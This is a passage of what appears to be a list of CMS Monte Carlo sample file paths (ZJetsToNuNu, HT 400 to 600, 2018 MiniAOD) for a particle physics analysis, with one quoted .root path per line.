'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7F8D1DC4-F9E0-DA4C-835D-7DFF6A90192E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/80B1DD08-6183-EE4F-9C5F-2A3BD1646276.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/80DC33C1-D266-3044-A536-3965DB5AF726.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8293D432-51D7-5143-86B7-03293A9A02E9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/82B625BB-48BE-2245-8426-52B794A25CB7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/82FD9101-6E53-AD44-AADC-B0AD025F4AC1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8545A55B-280A-8D45-A388-7F0651E5BDCC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8549D852-7D07-4841-B530-EA3485A3458E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/855D9595-9583-024D-B686-1A84952C52B2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/889863AA-391D-2649-8471-134DC95A767D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/88E60AAD-55D3-7D4A-9AB4-BCA6C9F3622E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/897CF060-79DC-C94C-9B28-B08763258639.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8A374375-1046-5D49-BFDE-61F6462AD7B0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8C7DDDB3-CD20-9743-8A3C-8D7A59BFF71F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8CBA46EC-71CF-3E47-9C11-D92EFDE34930.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8D890416-75E2-EE45-8096-5C60B9985075.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8D96DFFD-5324-034B-9408-00DBB11E2A8F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8FF03CAC-015C-3941-B00A-B6E5FF60B653.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/906F2305-C28C-AE4F-B01A-DB38C0B83654.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/90A02574-6C17-5143-89F8-E64AC5AB9E76.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/912A9104-760F-974D-A5DF-135C09D2253F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/91F4C5AE-79FC-BF49-A88E-0B67E2C745AA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/921543AB-4531-E446-A8B9-27FC7ADDC2A1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9233134E-8CB1-9A42-8563-421802E2CFA2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/92C31CE6-9196-D84B-886B-BE4D6A53385E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/932105D0-E0A1-3241-92FD-A770C1AA310D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/93809296-EBC9-6645-B9FA-AA448ADD6003.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/93832687-1615-CF41-8AAF-D6E2AD2D8818.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/93AE8129-E453-0B49-A700-D1CC50E456D5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9550AF60-AA98-5041-94D8-A27F78426372.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/959F4A97-8B81-7E4B-BF76-94B881EF6411.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/963B32C1-4886-004A-963D-BEC6F359FCCF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/96AABD73-E9EE-7043-B26A-08172487CFBC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/96BB3C3E-4F96-5947-8F3F-AB9F12723532.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/97A0834F-38B8-E44B-B6A8-A35B92B777E7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9B03C1B6-C891-BB42-8B1C-F918D81AE067.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9B9C60A1-4C45-8143-A959-CDE12DC7538C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9D1AAA3B-9655-1847-8F0D-8C7FB1859491.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9F053492-3C5B-BE4E-8D8D-CF2BDC0A932C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9F64232C-75DC-C249-92D5-3050E5305ABA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9FB6744B-B4B0-E941-8CA7-87508E158C29.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9FE7DFC7-C378-D14F-B2FF-1196C289015C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A021EBA2-C04F-AA42-8F7E-1029ED908FBB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A07F27CC-2948-E042-8290-9FAAC96E5E7E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A0B6CFA3-9304-F94B-9F65-F31618EB4790.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A1EDC2CF-3E9A-DC43-A04F-5B965CD92715.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A37F5C2D-4E4E-B548-8116-BD5D16363FEA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A41937CD-E91E-654F-9983-75E5A4835592.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A4656CF8-6CD0-EF48-9910-4EBA8EC505EB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A665F47D-71AF-5149-895C-C376F0F3F759.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A765DBD4-C24E-E74E-AB3E-ECA78927FFD2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A9065ED1-9A2F-9549-9175-49A21234ED6C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A9508C54-C7C9-554E-B411-DAD61D9028BA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A96B7967-6AB0-1D40-848C-06C4A4B46FCB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A989B027-4067-BC45-A081-03BDEB09D438.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A9B7F280-83C9-B04C-A474-97E80D655CDA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AA42E045-D7D3-E548-9127-7C20ACB8DD32.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AA842A10-4EFA-C84D-8E67-1CD26005AA60.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AACE6CDC-C2A0-564D-B4D3-0639E0D1787C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AAEF0060-1674-EE47-BAC1-5928E6ECE2BC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AC3CF156-4C78-BA43-9452-470E8552E071.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AC9E82B7-2BDB-2D4B-97C8-5DBD322C2EB2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AD55FAF1-85A8-914C-BB10-655A73CF40BD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/ADCA98E2-E50D-8047-A6CD-CBD2F5245C84.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AED09181-B446-2E42-BC8D-E6D32041E58E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B0539FFC-0772-0B48-8FC5-EF68027F0D8F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B1E25F15-391E-3545-8883-76D11FF6FDB5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B1E82694-B34F-2442-9286-C1827717400A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B2062ED9-B6F4-9E4C-B9DF-CA386EC7C829.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B30B3A74-E05E-B942-BE88-D27BC42DEAE3.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B3AF44FD-659F-8641-9840-54E934C26971.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B41CD208-D8DB-9846-A2D9-42F3A3807D33.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B465A781-7833-EE41-8F53-664EFEC12864.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B4C1B4F6-D039-FB4D-A075-4E4229A07D51.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B5C4154B-C994-824E-8397-6E0BFA1470C0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B5D35511-5D8B-5345-BC45-8646456F4579.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B5DC1FCF-A72B-D549-AE52-737A916F2EA6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B62504AC-508F-F942-9DE3-C86BA8966A9D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B868154B-F6BA-F94F-99D2-CDC280A71701.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B8E81521-326F-DC4C-91D4-8DD46275D50D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B9A4D574-D04A-9C46-8A64-7FFD3F6CA010.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B9C25D0F-99E7-0541-B4EA-90389872DFF1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BA3F3369-D8CF-974E-AAC7-2CD56EF8DBC1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BC1211B9-ECF6-D341-B324-86C69DDF81BD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BC157EF2-7F8B-7740-B8D7-521740E7EE9B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BCCCE38A-25DD-6645-B262-D6617E497881.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BD9AB5CA-91AB-A947-B5C5-C6715A8A387B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BD9FF0E9-89DC-A849-834F-7B4B2770F08C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BEC48540-56F2-2D40-9A6B-426A35257E13.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BF4A118D-8E92-F84C-86E7-7312A289D471.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BFFC965D-144B-4043-8BD9-F7C9D6D5A383.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C03D375F-8DEB-5C45-96D6-14AF284CE722.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C08F3A28-1139-834C-AF2D-94B3C07D9071.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C1311B3D-F620-5440-90FB-286693B3B708.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C26D8CED-AC18-C742-9712-BABB21C42D20.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C2A105B2-460E-8146-9B5C-7BD0A04C1C0E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C3129C89-8AFD-F84F-8B10-4A1D8C00DB46.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C3189655-0725-8944-BDFB-8DB6E65B1A2B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C347C2DB-A7E2-274E-9D16-1EF089CB4C61.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C4C79A1D-5F03-114E-997A-9DAAA5561A52.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C7A6E7C1-E5B3-024A-9503-E24EDC61CA2D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C7C42ABE-94A9-AB40-AFE6-920EDA10C25C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C97E4091-F37B-394B-BCE9-F1B66A129BA2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/CCD9A00F-9345-3648-A4A2-891A7BD1CAA8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/CD84826B-5BE2-004E-9656-B83C2FC789C8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/CD9A4248-D1CD-9B42-BB24-997D745D58D9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/CEBCAB8C-18E9-6240-B8D8-4ACFF47BA8EB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D04F0002-2265-204D-AE4C-2C5B6BF1234F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D072ECA5-E509-6941-9B5B-9C8247D3A6FD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/D0D7AB0E-B354-CB43-812B-BAABF56B757F.root',
